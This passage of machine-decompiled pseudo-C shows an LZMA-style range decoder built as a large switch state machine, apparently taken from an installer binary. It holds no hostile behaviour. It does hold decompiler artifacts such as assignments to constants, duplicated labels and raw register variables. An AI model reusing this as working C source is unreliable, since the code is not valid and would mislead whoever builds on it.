				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M00406C7B))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4)); // executed
											}
											_t538 = GlobalAlloc("true", 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8)); // executed
											}
											_t538 = GlobalAlloc("true",  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
